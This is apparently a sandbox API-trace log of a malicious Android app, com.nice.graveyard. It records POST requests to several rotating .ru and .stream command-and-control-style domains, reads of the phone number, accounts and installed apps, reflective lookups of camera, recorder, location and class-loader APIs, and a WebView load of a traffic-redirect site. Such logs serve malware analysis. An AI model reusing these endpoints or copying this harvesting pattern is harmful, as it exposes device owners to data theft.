D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://amsy28dekhyh7-i8nz97h55s.stream/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://0phi9dcwv-ox8owuidyl.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://0phi9dcwv-ox8owuidyl.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://k79dad3i7-8sgah92dx5.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://k79dad3i7-8sgah92dx5.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://x302b4ecy-873trb1x866.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://x302b4ecy-873trb1x866.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://zj78q9aoi7j-8cfyef7ymtf.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://zj78q9aoi7j-8cfyef7ymtf.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://ul53nxwdh-vec2z35efb.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://ul53nxwdh-vec2z35efb.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][MyPref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3962): [SDK] [android.accounts.AccountManager] [getAccounts]
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getInstalledApplications]
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.google.android.webview]
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [com.android.webview]
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.google.android.webview]
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.android.webview]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.android.webview]
D/S4URC   ( 3962): [SDK] [dalvik.system.BaseDexClassLoader] [Constructor] [DexPath][String] [/system/app/webview/webview.apk] [NDKPath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [java.io.File] [getName] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [dalvik.system.DexFile] [openDexFile] [DexPath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/vendor/lib]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/lib]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher.database.SQLiteDatabase]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher.database$SQLiteDatabase]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher$database$SQLiteDatabase]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [net$sqlcipher$database$SQLiteDatabase]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[Z]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[F]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[J]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[Z]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[J]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [[F]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.admin.DevicePolicyManager]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Activity]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Environment]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.ContentResolver]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Process]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.Camera]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.accounts.AccountManager]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.location.Location]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.webkit.WebView]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.media.MediaRecorder]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.BaseDexClassLoader]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.DexFile]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.DexClassLoader]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ApplicationPackageManager]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ActivityManager]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runtime]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Class]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.webview.chromium.WebViewChromiumFactoryProvider]
D/S4URC   ( 3962): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [webviewchromium]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm/libwebviewchromium.so]
D/S4URC   ( 3962): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [webviewchromium_plat_support]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm/libwebviewchromium_plat_support.so]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/vendor/lib]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/vendor/lib/libwebviewchromium_plat_support.so]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/lib]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/lib/libwebviewchromium_plat_support.so]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][lastVersionCodeUsed] [Return][0]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][lastVersionCodeUsed] [Value][300001]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3962): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.nice.graveyard/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard]
D/S4URC   ( 3962): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.nice.graveyard/app_webview]
D/S4URC   ( 3962): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/com.nice.graveyard/app_webview]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/app_webview]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Message]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.HEADSET_PLUG,
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.nice.graveyard]
D/S4URC   ( 3962): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [com.nice.graveyard]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.TIMEZONE_CHANGED,
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.nice.graveyard/databases]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper] [getDatabasePath] [PathInfo][String] [foo]
D/S4URC   ( 3962): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/com.nice.graveyard/databases/foo]
D/S4URC   ( 3962): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.PROXY_CHANGE,
D/S4URC   ( 3962): [SDK] [android.webkit.WebView] [loadUrl] [Url][about:blank]
D/S4URC   ( 3962): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/meminfo]
D/S4URC   ( 3962): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/meminfo]
D/S4URC   ( 3962): [SDK] [android.webkit.WebView] [loadUrl] [Url][http://whitetraffsend.club/in/main/?apk=2700054461]
D/S4URC   ( 3962): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Message]
